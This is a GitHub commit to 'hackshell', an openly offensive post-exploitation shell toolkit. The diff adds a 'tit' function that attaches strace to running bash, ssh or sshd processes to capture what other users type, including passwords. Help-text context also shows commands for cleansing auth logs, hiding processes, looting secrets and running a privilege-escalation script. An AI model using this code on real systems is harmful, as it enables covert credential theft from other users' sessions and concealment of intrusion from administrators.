Skip to content

Commit c75f148

Browse files
rootTHCrootTHC
committed
hackshell
1 parent 0b85089 commit c75f148

File tree

1 file changed

+34
-0
lines changed

1 file changed

+34
-0
lines changed

hs

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -63,6 +63,14 @@ dbin install nmap - install nmap
6363
dbin list - List ALL binaries"
6464
}
6565

66+
xhelp_tit() {
67+
echo -e "
68+
${CDC}tit${CN} - List PIDS that can be sniffed
69+
${CDC}tit read <PID>${CN} - Sniff bash shell (bash reads from user input)
70+
${CDC}tit read <PID>${CN} - Sniff ssh session (ssh reads from user input)
71+
${CDC}tit write <PID>${CN} - Sniff sshd session (sshd writes to the PTY/shell)"
72+
}
73+
6674
xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; }
6775
xsu() {
6876
local name="${1:?}"
@@ -327,6 +335,7 @@ lssr() {
327335
find "$@" -printf "%s %M %u %g % 10s %Tb %Td %Tk:%TM %p\n" | sort -n | cut -f2- -d' '
328336
}
329337

338+
330339
hide() {
331340
local _pid="${1:-$$}"
332341
local ts_d ts_f
@@ -384,6 +393,29 @@ keep() {
384393
HS_INFO "Wont delete ${CDY}${XHOME}${CDM} on exit"
385394
}
386395

396+
tit() {
397+
local str
398+
_hs_dep strace
399+
_hs_dep awk
400+
_hs_dep grep
401+
402+
[ $# -eq 0 ] && {
403+
str="$(ps -eF | grep -E '(^UID|bash|ssh )' | grep -v ' grep')"
404+
[ -n "$str" ] && {
405+
echo -e "${CDM}Use ${CDC}tit read <PID>${CDM} on:${CDY}${CF}"
406+
echo "$str"
407+
}
408+
str="$(ps -eF | grep -E '(^UID|sshd.*pts)' | grep -v ' grep')"
409+
[ -n "$str" ] && {
410+
echo -e "${CDM}Use ${CDC}tit write <PID>${CDM} on:${CDY}${CF}"
411+
echo "$str"
412+
}
413+
echo -e "${CN}>>> ${CW}TIP${CN}: ${CDC}ptysnoop.bt${CN} from ${CB}${CUL}https://github.com/hackerschoice/bpfhacks${CN} works better"
414+
return
415+
}
416+
strace -e trace="${1:?}" -p "${2:?}" 2>&1 | stdbuf -oL grep "^${1}"'.*= [1-9]$' | awk 'BEGIN{FS="\"";}{if ($2=="\\r"){print ""}else{printf $2}}'
417+
}
418+
387419
np() {
388420
local cmdl=()
389421
_hs_dep noseyparker || return
@@ -1122,6 +1154,7 @@ xhelp() {
11221154
11231155
[[ "$1" == "scan" ]] && { xhelp_scan; return; }
11241156
[[ "$1" == "dbin" ]] && { xhelp_dbin; return; }
1157+
[[ "$1" == "tit" ]] && { xhelp_tit; return; }
11251158
11261159
echo -en "\
11271160
${CDC} xlog '1\.2\.3\.4' /var/log/auth.log ${CDM}Cleanse log file
@@ -1147,6 +1180,7 @@ ${CDC} rdns 1.2.3.4 ${CDM}Reverse DNS from multiple pub
11471180
${CDC} cn <IP> [<port>] ${CDM}Display TLS's CommonName of remote IP
11481181
${CDC} scan <port> [<IP or file> ...] ${CDM}TCP Scan a port + IP ${CN}${CF}[xhelp scan]
11491182
${CDC} hide <pid> ${CDM}Hide a process
1183+
${CDC} tit <read/write> <pid> ${CDM}Sniff/strace the User Input [xhelp tit]
11501184
${CDC} np <directory> ${CDM}Display secrets with NoseyParker ${CN}${CF}[try |less -R]
11511185
${CDC} loot ${CDM}Display common secrets
11521186
${CDC} lpe ${CDM}Run linPEAS

0 commit comments

Comments
 (0)